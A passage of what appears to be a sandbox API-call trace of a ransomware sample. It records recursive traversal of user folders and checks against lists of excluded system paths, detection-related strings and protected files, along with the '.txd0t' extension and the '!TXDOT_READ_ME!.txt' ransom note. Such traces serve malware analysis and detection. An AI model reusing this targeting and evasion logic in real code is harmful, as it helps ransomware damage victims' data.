lpSrch=":\\boot\\") returned 0x0 [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\perflogs\\") returned 0x0 [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\programdata\\") returned 0x0 [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\drivers\\") returned 0x0 [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\wsus\\") returned 0x0 [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="crypt_detect") returned 0x0 [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="cryptolocker") returned 0x0 [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="ransomware") returned 0x0 [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="C:\\WINDOWS") returned 0x0 [0089.837] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.838] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="C:\\Program Files") returned 0x0 [0089.838] GetProcessHeap () returned 0xe30000 [0089.838] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c8) returned 0xec65b0 [0089.838] StrCpyNW (in: psz1=0xec65b0, psz2="C:\\Users\\Default.migrated\\Documents", cchMax=1096 | out: psz1="C:\\Users\\Default.migrated\\Documents") returned="C:\\Users\\Default.migrated\\Documents" [0089.838] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\Documents", psz2="\\*", cchMax=1096 | out: psz1="C:\\Users\\Default.migrated\\Documents\\*") returned="C:\\Users\\Default.migrated\\Documents\\*" [0089.838] FindFirstFileW (in: lpFileName="C:\\Users\\Default.migrated\\Documents\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4204fb0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5636bd87, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec25f0 [0089.839] StrCmpW (psz1=".", psz2=".") returned 0 [0089.839] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4204fb0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5636bd87, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.839] StrCmpW (psz1="..", psz2=".") returned 1 [0089.839] StrCmpW (psz1="..", psz2="..") returned 0 [0089.839] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99a3d0f, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99a3d0f, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99a3d0f, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0089.839] StrCmpW (psz1="My Music", psz2=".") returned 1 [0089.839] StrCmpW (psz1="My Music", psz2="..") returned 1 [0089.840] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99c9f63, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99c9f63, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99c9f63, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0089.840] StrCmpW (psz1="My Pictures", psz2=".") returned 1 [0089.840] StrCmpW (psz1="My Pictures", psz2="..") returned 1 [0089.840] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99c9f63, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99c9f63, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99c9f63, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0089.840] StrCmpW (psz1="My Videos", psz2=".") returned 1 [0089.840] StrCmpW (psz1="My Videos", psz2="..") returned 1 [0089.840] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99c9f63, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99c9f63, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99c9f63, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0089.840] FindClose (in: hFindFile=0xec25f0 | out: hFindFile=0xec25f0) returned 1 [0089.841] GetProcessHeap () returned 0xe30000 [0089.841] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec65b0 | out: hHeap=0xe30000) returned 1 [0089.841] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4204fb0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5636bd87, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0 [0089.841] FindClose (in: hFindFile=0xec2730 | out: hFindFile=0xec2730) returned 1 [0089.841] GetProcessHeap () returned 0xe30000 [0089.841] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec50e8 | out: hHeap=0xe30000) returned 1 [0089.841] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1a9bc987, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5f69dfa, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5f69dfa, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0089.841] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0089.841] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0089.841] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 1 [0089.841] StrCmpW (psz1="FD1HVy", psz2=".") returned 1 [0089.841] StrCmpW (psz1="FD1HVy", psz2="..") returned 1 [0089.841] StrCpyNW (in: psz1=0xeda7a8, psz2="C:\\Users", cchMax=1042 | out: psz1="C:\\Users") returned="C:\\Users" [0089.841] StrNCatW (in: psz1="C:\\Users", psz2="\\", cchMax=1042 | out: psz1="C:\\Users\\") returned="C:\\Users\\" [0089.841] StrNCatW (in: psz1="C:\\Users\\", psz2="FD1HVy", cchMax=1042 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0089.841] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\windows\\system32\\") returned 0x0 [0090.008] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.008] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\windows\\system\\") returned 0x0 [0090.008] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.008] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.008] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\appdata\\local\\") returned 0x0 [0090.008] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.008] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.008] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.009] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\boot\\") returned 0x0 [0090.009] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\perflogs\\") returned 0x0 [0090.009] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\programdata\\") returned 0x0 [0090.009] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\drivers\\") returned 0x0 [0090.009] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\wsus\\") returned 0x0 [0090.009] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.009] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.009] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="crypt_detect") returned 0x0 [0090.009] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="cryptolocker") returned 0x0 [0090.009] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="ransomware") returned 0x0 [0090.009] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="C:\\WINDOWS") returned 0x0 [0090.009] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.009] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="C:\\Program Files") returned 0x0 [0090.009] GetProcessHeap () returned 0xe30000 [0090.009] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4a0) returned 0xec60f0 [0090.009] StrCpyNW (in: psz1=0xec60f0, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0090.009] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\*", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\*") returned="C:\\Users\\FD1HVy\\*" [0090.009] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec25f0 [0090.009] StrCmpW (psz1=".", psz2=".") returned 0 [0090.009] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.009] StrCmpW (psz1="..", psz2=".") returned 1 [0090.009] StrCmpW (psz1="..", psz2="..") returned 0 [0090.009] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0090.009] StrCmpW (psz1="AppData", psz2=".") returned 1 [0090.009] StrCmpW (psz1="AppData", psz2="..") returned 1 [0090.010] StrCpyNW (in: psz1=0xec60f0, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0090.010] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0090.010] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="AppData", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\windows\\system32\\") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\windows\\system\\") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\appdata\\local\\") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\boot\\") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\perflogs\\") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\programdata\\") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\drivers\\") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\wsus\\") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="crypt_detect") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="cryptolocker") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="ransomware") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="C:\\WINDOWS") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.010] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="C:\\Program Files") returned 0x0 [0090.010] GetProcessHeap () returned 0xe30000 [0090.010] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b0) returned 0xec75a0 [0090.010] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\AppData", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0090.010] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData", psz2="\\*", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\*") returned="C:\\Users\\FD1HVy\\AppData\\*" [0090.010] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2630 [0090.011] StrCmpW (psz1=".", psz2=".") returned 0 [0090.011] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.011] StrCmpW (psz1="..", psz2=".") returned 1 [0090.011] StrCmpW (psz1="..", psz2="..") returned 0 [0090.011] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x50235c0f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50235c0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0090.011] StrCmpW (psz1="Local", psz2=".") returned 1 [0090.011] StrCmpW (psz1="Local", psz2="..") returned 1 [0090.011] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\AppData", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0090.011] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\" [0090.011] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\", psz2="Local", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\windows\\system32\\") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\windows\\system\\") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\appdata\\local\\") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\boot\\") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\perflogs\\") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\programdata\\") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\drivers\\") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\wsus\\") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="crypt_detect") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="cryptolocker") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="ransomware") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="C:\\WINDOWS") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.011] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="C:\\Program Files") returned 0x0 [0090.012] GetProcessHeap () returned 0xe30000 [0090.012] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4bc) returned 0xec7a58 [0090.012] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.012] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\*", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\*") returned="C:\\Users\\FD1HVy\\AppData\\Local\\*" [0090.012] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\*", lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x50235c0f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50235c0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2070 [0090.012] StrCmpW (psz1=".", psz2=".") returned 0 [0090.012] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x50235c0f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50235c0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.012] StrCmpW (psz1="..", psz2=".") returned 1 [0090.012] StrCmpW (psz1="..", psz2="..") returned 0 [0090.012] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x501e95f1, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x501e95f1, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50235c0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.012] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.012] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.012] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.012] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0090.012] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\AppData\\Local\\!TXDOT_READ_ME!.txt" [0090.012] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.012] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.012] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.012] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.012] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.012] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.012] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.012] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.012] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.012] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.012] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.012] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.012] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.012] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.012] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.013] StrCmpIW 